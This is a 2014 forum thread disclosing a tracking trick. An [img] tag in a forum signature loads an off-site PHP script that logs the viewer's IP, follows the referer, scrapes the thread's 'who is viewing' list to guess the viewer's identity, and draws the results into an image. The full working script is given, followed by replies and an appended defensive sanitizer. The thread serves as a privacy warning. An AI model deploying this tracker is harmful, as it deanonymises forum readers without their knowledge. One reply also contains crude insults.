Author Topic: Why you should hide your online status on forums  (Read 797 times)

0 Members and 1 Guest are viewing this topic.

Offline burroughs

Why you should hide your online status on forums
« on: November 17, 2014, 01:47:28 am »
NOTE: Refresh this page once it loads for the first time to get the full effect. The referer is not set to this thread when clicking into it elsewhere.

This is a rehash of a post I made on &T2 a while back.



What's going on?

PHP scripts can output images with the appropriate libraries - these scripts can be referenced as images in html and BB code just as any static file might be. But we can do whatever we want in our script before returning content, and we can do some pretty naughty things. Specifically:

  • Embed a script on a forum signature that outputs an image.
  • When a user loads this image, the HTTP referer header will be the previous page they came from.
  • Using this referer value, we can make an HTTP request back to the same page and parse the HTML looking for the "... is viewing this topic" text.
  • Even if there are multiple people viewing, we can make a guess at an IP address if we log enough requests through a process of elimination. We can also track their viewing habits over time.
  • We can disguise our image with some nice pr0n instead of politely informing a user that we know who they are.

Things we learned
  • You should always hide your online status on forums.
  • It's a bad idea to allow users to reference external resources, especially in areas with a lot of exposure like signatures.

Code

Code: [Select]
[img]http://bursylursy.webatu.com/tracking.php[/img]
Code: [Select]
<?php
// Disable caching so the script runs on every page view.
header("Pragma-directive: no-cache");
header("Cache-directive: no-cache");
header("Cache-control: no-cache");
header("Pragma: no-cache");
header("Expires: 0");

error_reporting(0);
$ip = $_SERVER["REMOTE_ADDR"];
$ref = $_SERVER["HTTP_REFERER"];
$displayusers = "";

if (strlen($ref) > 0) {
    header("Content-type: image/png");

    // Fetch the referring thread and read its "who is viewing" element.
    $response = file_get_contents($ref);
    $doc = new DOMDocument();
    $doc->loadHTML($response);
    $users = $doc->getElementById("whoisviewing")->nodeValue;

    if (strpos($users, "Members") === false) {
        $displayusers = "You are probably one of these users: " . substr($users, 0, strpos($users, " and"));
    }

    // Render the collected values as text on a 900x70 image.
    $im = imagecreate(900, 70);
    $bg = imagecolorallocate($im, 255, 255, 255);
    $textcolor = imagecolorallocate($im, 0, 0, 255);

    imagestring($im, 5, 5, 5, "Your ip address is: " . $ip, $textcolor);
    imagestring($im, 5, 5, 25, "You are viewing this page: " . $ref, $textcolor);
    imagestring($im, 5, 5, 45, $displayusers, $textcolor);

    imagepng($im);
    imagedestroy($im);
} else {
    // No referer: serve a static image instead.
    header("Content-type: image/jpeg");
    $im = imagecreatefromjpeg("http://www.quickmeme.com/img/fa/fa3e19ffd513583d5f7ae60382262d9a0505d72589cd2374af2b2a7de75e057d.jpg");
    imagejpeg($im);
    imagedestroy($im);
}
?>

« Last Edit: November 17, 2014, 01:56:54 am by burroughs »

Offline BallsDeep69

Re: Why you should hide your online status on forums
« Reply #1 on: November 17, 2014, 02:06:29 am »
*gasp*
My will, as it were.
To Zek, get over the fucking kittens man.

To RisiR, you'll always be my favourite hater.

To -SpectraL, you're one of the only people here who can insult Arnox without ramming it down his throat.

To Arnox, fuck you.

Offline stdio.h

Re: Why you should hide your online status on forums
« Reply #2 on: November 17, 2014, 02:17:32 am »
I highly recommend using the JonDoFox Firefox profile. In addition to having NoScript enabled by default, it hides the referer when switching domains, preventing this type of attack.
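
A forum-side counterpart to the two lessons in the first post and to the referer hiding mentioned above, as an added example that is not part of the thread or of any forum software's code. The function names and the `forum.example` hosts are assumptions; the sample signature is constructed.

```php
<?php
// Added example; function names and hosts are hypothetical, not forum code.

// Image hosts the forum operator controls (assumed values).
const ALLOWED_IMAGE_HOSTS = ['forum.example', 'img.forum.example'];

// Call before any output: asks browsers to omit the Referer header on
// cross-origin requests, so an off-site resource never learns which
// thread the reader had open.
function send_referrer_policy(): void
{
    header('Referrer-Policy: same-origin');
}

// Rewrite [img] BBCode before storing a post or signature: images on
// allowlisted hosts are kept, anything else becomes inert text, so the
// reader's browser makes no request to a poster-controlled server.
function sanitize_img_bbcode(string $bbcode): string
{
    return preg_replace_callback(
        '~\[img[^\]]*\](.*?)\[/img\]~is',
        function (array $m): string {
            $url    = trim($m[1]);
            $parts  = parse_url($url) ?: [];
            $scheme = strtolower($parts['scheme'] ?? '');
            $host   = strtolower($parts['host'] ?? '');
            // URL parsers disagree on backslashes, '@' and whitespace,
            // so URLs containing them are rejected outright.
            if (strpbrk($url, "\\@ \t\r\n") === false
                && in_array($scheme, ['http', 'https'], true)
                && in_array($host, ALLOWED_IMAGE_HOSTS, true)) {
                return '[img]' . $url . '[/img]';
            }
            // Show only a sanitized host name, never a loadable URL.
            $label = preg_replace('/[^a-z0-9.-]/', '', $host);
            return '[external image removed: '
                . ($label !== '' ? $label : 'invalid URL') . ']';
        },
        $bbcode
    );
}

// Constructed sample signature: one on-site image and the off-site one
// from the first post.
$signature = "[img]https://img.forum.example/avatars/42.png[/img]\n"
           . "[img]http://bursylursy.webatu.com/tracking.php[/img]";

echo sanitize_img_bbcode($signature), "\n";
```

The allowlist stops the image request itself, which also protects the reader's IP address; the `Referrer-Policy` header only withholds the thread URL from resources that still load.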